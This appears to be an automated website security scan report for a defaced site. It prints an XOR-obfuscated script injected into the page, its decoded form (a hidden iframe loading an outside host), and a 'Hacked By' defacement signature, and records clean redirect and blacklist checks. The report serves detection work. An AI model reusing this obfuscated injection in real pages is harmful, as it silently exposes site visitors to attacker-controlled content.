Scanned pages/files
Request | Server response | Status |
http://elseworld.org/ | 200 OK Content-Length: 11983 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame.
var enkripsi="'02'02'02'02'1Akdpcog'02qpa'1F'00jvvr'1C--`cn{cl,kp-fgom-pf,jvon'00'02qapmnnkle'1F'00lm'00'02jgkejv'1F'00332'07'00'02ukfvj'1F'00322'07'00'02kf'1F'00dpo'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
Decoded script: <iframe src="http://balyan.ir/demo/rd.html" scrolling="no" height="110%" width="100%" id="frm"></iframe>
Deface/Content modification. The following signature was found: Hacked By Dr4GOn
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <title>Hacked By Dr4GOn</title> <style> #frm{ border:none; overflow:no-content; position:absolute; top:0; left:0; z-index:-100; } .wrapper{ width:100%; height:100%; background:transparent; position:absolute; z-index:-99; top:0; ...[13399 bytes skipped]...
http://elseworld.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elseworld.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 15 Dec 2015 16:16:31 GMT
Accept-Ranges: bytes
ETag: "2ecf-45d7685d9a500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 11983
Content-Type: text/html
Last-Modified: Sun, 07 Dec 2008 15:25:40 GMT
X-Pad: avoid browser bug
...11983 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: elseworld.org
Referer: http://www.google.com/search?q=elseworld.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elseworld.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://elseworld.org/
Result: elseworld.org is not infected or malware details are not published yet.